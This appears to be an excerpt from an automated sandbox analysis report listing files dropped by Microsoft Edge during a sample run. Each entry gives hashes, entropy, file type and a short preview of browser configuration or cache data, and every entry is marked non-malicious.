Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090741681997585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEx6Ltbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:A23AFFFB2AD172F8A25DFBB6C88DEBE5
                                                                                                                                                                                                                                                                                    SHA1:1E6011053C61C791E9D7A02A0388E721DE1976C8
                                                                                                                                                                                                                                                                                    SHA-256:5DD06868735CEAB9CD4F0BB65D7B6758B03B186C523E0C97FCE07720846B5433
                                                                                                                                                                                                                                                                                    SHA-512:427E889ED37A9F26B422346AA275D8E735F74EC8F1DB321DCA0B9A8E137F0649284D974B2969C7F47706A49721357EC03CB94C66752A833B943C4990355D87AB
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                    MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                    SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                    SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                    SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                    Malicious:false
Preview:SQLite format 3......@ ..........................................................................j
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):81
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                    MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                    SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                    SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                    SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130439
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                    MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                    SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                    SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                    SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                    MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                    SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                    SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                    SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                    MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                    SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                    SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                    SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                    MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                    SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                    SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                    SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):460992
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                    MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                    SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                    SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                    SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                    MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                    SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                    SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                    SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:uriCache_
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.0073646441709725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQybQ8yV:YWLSGTt1o9LuLgfGBPAzkVj/T8lQy08M
                                                                                                                                                                                                                                                                                    MD5:23CCD1445A424F2A1D1028E9BA23B50C
                                                                                                                                                                                                                                                                                    SHA1:D3336FBFA977968F4196632AC5C9AE27FA82515D
                                                                                                                                                                                                                                                                                    SHA-256:C3960D815F60E8503CB1B5F7194CAC7A63CD4ABED5D46A5096F42A7D154642B1
                                                                                                                                                                                                                                                                                    SHA-512:04A1EC676C1AB1E9B21BE883AC4E4CB0B2A020266026FD7FA99C7E14087F5BBA96AFAD6AEED443DB43A4A66E0252039A8A1CCA53C8FF7267FFEE2207A9723568
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735034272753730}]}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                    MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                    SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                    SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                    SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45775
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.088255317822599
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:mMkbJrT8IeQc5d9FavuAhDO6vP6OrhR8qLKvFwycfCAoGGoup1Xl3jVzXr4QK:mMk1rT8H19F/6L/FRoGhu3VlXr4d
                                                                                                                                                                                                                                                                                    MD5:DFEF31F3E779AAE0F3A131149927A1D0
                                                                                                                                                                                                                                                                                    SHA1:7F826B8337DC5375A980BA54D5D38EBC31CEED94
                                                                                                                                                                                                                                                                                    SHA-256:C4288345EE4B0911A747B2F9BCCB4FAA1A4EB98BB889D3815EA44C69EAFE671D
                                                                                                                                                                                                                                                                                    SHA-512:12D4D2BBC4540D9C5110BFBE50083B31F0F39AE3EE11F69797B49594DEE53D644E5D3A945B5ED60A13E44656AA923445D50DB5B730C9D41CA938DA9E2E3A8537
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2278
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.831242095774037
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxrgxzxl9Il8u/Je7a0ozwcrqJk0CsQyd1rc:mCYpJe7a0oscrqJk3sC
                                                                                                                                                                                                                                                                                    MD5:2209BD89B6DF5D609AA51791DC16948A
                                                                                                                                                                                                                                                                                    SHA1:4D3DCCAD2D5E853A7C20D533C85BD7957830017B
                                                                                                                                                                                                                                                                                    SHA-256:656B2BE793FE60B7C8D0342305A5B808D5A25E34025490D9FB8270FCB4FAEF12
                                                                                                                                                                                                                                                                                    SHA-512:A0DA5AF6ACE45C09B343A04060A70E7CED42384B5EBC7D9731F800A3324E01626C56776C75B488CD9C2659C0B730980CD20AC2E7F788E6F32A693A84692FD06D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.B.g.W./.A.d.V.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.m.Z.E.J.T.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4622
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.985475935839216
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxExDVxD9Il8u/QWK0Xr6D8AF1IQf1MH2+V4KJSvpF6YhAtfois8Bl/IlHL:3YpK0a86tMHNJSR0CQTsHRWLaSjXWwKz
                                                                                                                                                                                                                                                                                    MD5:0D569CD66E7006E5BFFA09E6A180B0A8
                                                                                                                                                                                                                                                                                    SHA1:885829B633AAA91D0007CBC461BE22C40DCD99A9
                                                                                                                                                                                                                                                                                    SHA-256:1D46B98FF29EF32483FDBD12755BE827F6856627F101BBB7838FE2FB1C8E546B
                                                                                                                                                                                                                                                                                    SHA-512:9E92EE84E3BDC534F80B7BB646228E9277E1214EE9EC72341E6E22EE9CA26926391E62561696DEEB2DD460D228EF1E8F72BBB3A209E50686806C9E319BA979CA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".q.6.k./.4.f.9.U.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.m.Z.E.J.T.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.911982759131685
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKx68Wa7x2Jxl9Il8u/FqGzk0ZUbbhqz35sPuZSGhyqKkoWd/vc:aMYpFq84Nqzp/ZwqQ
                                                                                                                                                                                                                                                                                    MD5:69A6BCFE0860ED528118BCED16C7949B
                                                                                                                                                                                                                                                                                    SHA1:566A9ADD5800FA9E7E82B98D56EA24CB125A14D8
                                                                                                                                                                                                                                                                                    SHA-256:B6BEB65484F8C4C597C51FF7390FD865A4509EF88C967231C8EE7B329BF3740F
                                                                                                                                                                                                                                                                                    SHA-512:513CD41B1E49EEE56F9AD226DA699FE43F1417611F9D19614AFB38385325C28DFACF8F9C247065D220D691A96DC666564A235B70A62F198B5008E44F1CDD2D52
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".H.M.h.3.E.d.F.z.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.m.Z.E.J.T.
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
